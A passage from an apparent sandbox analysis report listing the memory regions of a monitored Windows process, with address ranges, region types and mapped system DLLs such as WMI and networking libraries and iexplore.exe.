2867 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2868 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2869 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2870 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2871 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2872 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2873 start_va = 0x3d0000 end_va = 0x3d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2874 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2875 start_va = 0x3d0000 end_va = 0x3d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2876 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2877 start_va = 0x3c0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2878 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2879 start_va = 0x3c0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2880 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2881 start_va = 0x3c0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2882 start_va = 0x6d770000 end_va = 0x6d907fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 2883 start_va = 0x6d5c0000 end_va = 0x6d762fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 2884 start_va = 0x6c750000 end_va = 0x6d5b5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 2885 start_va = 0x6c5c0000 end_va = 0x6c74ffff monitored = 0 entry_point = 0x6c65d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 2886 start_va = 0x940000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 2887 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2888 start_va = 0x4700000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2889 start_va = 0x4850000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 2890 start_va = 0x4700000 end_va = 0x47defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 2891 start_va = 0x4810000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2892 start_va = 0x4c40000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 2893 start_va = 0x4e20000 end_va = 0x4f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 2894 start_va = 0xfffaa000 end_va = 0xfffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffaa000" filename = "" Region: id = 2895 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 2896 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2897 start_va = 0x4d20000 end_va = 0x4e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 2898 start_va = 0xfffa7000 end_va = 0xfffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa7000" filename = "" Region: id = 2899 start_va = 0x6c550000 end_va = 0x6c5b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.dynamic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\System.Dynamic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\system.dynamic.ni.dll") Region: id = 3063 start_va = 0x4c80000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 3064 start_va = 0x4f60000 end_va = 0x505ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 3065 start_va = 0xfffa4000 end_va = 0xfffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa4000" filename = "" Region: id = 3066 start_va = 0x5080000 end_va = 0x50bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 3067 start_va = 0x5160000 end_va = 0x525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 3068 start_va = 0xfffa1000 end_va = 0xfffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa1000" filename = "" Region: id = 3069 start_va = 0x727f0000 end_va = 0x727f7fff monitored = 0 entry_point = 0x727f10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3070 start_va = 0x6c420000 end_va = 0x6c54ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 3075 start_va = 0x743e0000 end_va = 0x743edfff monitored = 0 entry_point = 0x743e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 3076 start_va = 0x2160000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 3077 start_va = 0x5380000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 3078 start_va = 0x727c0000 end_va = 0x727e0fff monitored = 1 entry_point = 0x727c98e0 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 3079 start_va = 0xfff3d000 end_va = 0xfff3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3d000" filename = "" Region: id = 3080 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3081 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3082 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3083 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 3084 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3085 start_va = 0x5260000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3086 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 3087 start_va = 0x6c200000 end_va = 0x6c219fff monitored = 0 entry_point = 0x6c2103d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 3088 start_va = 0x6c190000 end_va = 0x6c1f0fff monitored = 0 entry_point = 0x6c1cbf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 3089 start_va = 0x6c180000 end_va = 0x6c18afff monitored = 0 entry_point = 0x6c1852a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3090 start_va = 0x6c170000 end_va = 0x6c17efff monitored = 0 entry_point = 0x6c1793d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3091 start_va = 0x6c0c0000 end_va = 0x6c165fff monitored = 0 entry_point = 0x6c12a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3092 start_va = 0x6c0a0000 end_va = 0x6c0b7fff monitored = 0 entry_point = 0x6c0a1335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 3198 start_va = 0x3f0000 end_va = 0x3f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3199 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3200 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3201 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3202 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3203 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3204 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3205 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3206 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3207 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3208 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3209 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3210 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3211 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3212 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3216 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3217 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3219 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3220 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3221 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3222 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3223 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3224 start_va = 0x5480000 end_va = 0x5971fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 3225 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3226 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3227 start_va = 0x5980000 end_va = 0x5e71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005980000" filename = "" Region: id = 3228 start_va = 0x6c320000 end_va = 0x6c41afff monitored = 0 entry_point = 0x6c3317e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 3229 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 3231 start_va = 0x5120000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 3232 start_va = 0x6060000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 3233 start_va = 0xfff3a000 end_va = 0xfff3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3a000" filename = "" Region: id = 3314 start_va = 0x6c240000 end_va = 0x6c317fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Security\\93d03eb9812405fa70e89d4efd5f7e14\\System.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.security\\93d03eb9812405fa70e89d4efd5f7e14\\system.security.ni.dll") Region: id = 3315 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3316 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3317 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3318 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3319 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3990 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3991 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3992 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3993 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3994 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3995 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3996 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3997 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3998 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3999 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4000 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4001 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4002 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4003 start_va = 0x640000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 4004 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4005 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4006 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4007 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4008 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4009 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4010 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4011 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 4012 start_va = 0x5480000 end_va = 0x5525fff monitored = 0 entry_point = 0x5481c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 4013 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 4014 start_va = 0x5480000 end_va = 0x5525fff monitored = 0 entry_point = 0x5481c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 4015 start_va = 0x5480000 end_va = 0x553ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4016 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4017 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4018 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4397 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4398 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4399 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4400 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4401 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4402 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 4403 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4404 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4405 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4406 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4407 start_va = 0x670000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 4408 start_va = 0x74360000 end_va = 0x743b1fff monitored = 0 entry_point = 0x743614be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 4409 start_va = 0x74340000 end_va = 0x74354fff monitored = 0 entry_point = 0x743412de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 4410 start_va = 0x74330000 end_va = 0x7433cfff monitored = 0 entry_point = 0x74331326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 4411 start_va = 0x5580000 end_va = 0x55bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 4412 start_va = 0x55e0000 end_va = 0x56dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055e0000" filename = "" Region: id = 4413 start_va = 0x6c040000 end_va = 0x6c097fff monitored = 0 entry_point = 0x6c0413b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 4414 start_va = 0xfff37000 end_va = 0xfff39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff37000" filename = "" Region: id = 4415 start_va = 0x6bff0000 end_va = 0x6c03efff monitored = 0 entry_point = 0x6bff1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 4416 start_va = 0x72ca0000 end_va = 0x72ca7fff monitored = 0 entry_point = 0x72ca34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 4417 start_va = 0x72c90000 end_va = 0x72c9cfff monitored = 0 entry_point = 0x72c92012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 4418 start_va = 0x6bfd0000 end_va = 0x6bfe1fff monitored = 0 entry_point = 0x6bfd3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 4419 start_va = 0x50d0000 end_va = 0x510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 4420 start_va = 0x5740000 end_va = 0x583ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 4421 start_va = 0xfff34000 end_va = 0xfff36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff34000" filename = "" Region: id = 4422 start_va = 0x5870000 end_va = 0x58affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 4423 start_va = 0x59f0000 end_va = 0x5aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059f0000" filename = "" Region: id = 4424 start_va = 0xfff31000 end_va = 0xfff33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff31000" filename = "" Region: id = 4425 start_va = 0x740a0000 end_va = 0x74194fff monitored = 0 entry_point = 0x740b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 4426 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 4427 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = 